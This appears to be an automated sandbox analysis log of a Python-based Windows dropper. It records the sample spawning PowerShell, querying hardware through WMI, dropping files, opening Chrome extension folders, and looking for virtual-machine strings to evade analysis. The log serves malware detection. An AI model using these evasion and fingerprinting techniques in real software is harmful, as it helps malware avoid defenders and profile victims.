              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (53 occurrences)
              Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (66 occurrences)
              Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
              Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (79 occurrences)
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (47 occurrences)
              Note: NOOPENFILEERRORBOX is the SEM_NOOPENFILEERRORBOX flag of SetErrorMode, which only suppresses the "file not found" message box. In this trace it is set by every spawned helper, stock Windows tools such as tasklist.exe, netsh.exe and getmac.exe included, so the entry carries little signal on its own; the 245 powershell.exe hits reflect how many PowerShell instances the dropper launches, not a dedicated evasion routine.

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 455
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4899
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4440
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 353
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4550
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1301
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3420
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1705
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5989
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1029
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3685
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1727
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2743
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1273
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3192
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 809
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | API coverage: 1.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 | Thread sleep count: 455 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 | Thread sleep count: 4899 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 | Thread sleep count: 4440 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784 | Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 | Thread sleep count: 353 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 | Thread sleep count: 4550 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 | Thread sleep count: 258 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268 | Thread sleep count: 1301 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836 | Thread sleep count: 3420 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864 | Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824 | Thread sleep count: 1705 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236 | Thread sleep count: 5989 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236 | Thread sleep count: 1029 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2524 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 | Thread sleep count: 3685 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 | Thread sleep count: 1727 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432 | Thread sleep count: 2743 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8740 | Thread sleep count: 1273 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032 | Thread sleep count: 3192 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028 | Thread sleep count: 809 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 0_2_00007FF7B10F8AF0 FindFirstFileExW,FindClose
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 0_2_00007FF7B11124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D3188E0 FindFirstFileExA
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2CE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V|
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457473239.0000016196D0F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1434396229.0000016196D0F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424053605.0000016196D08000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C5D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWa
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696497155
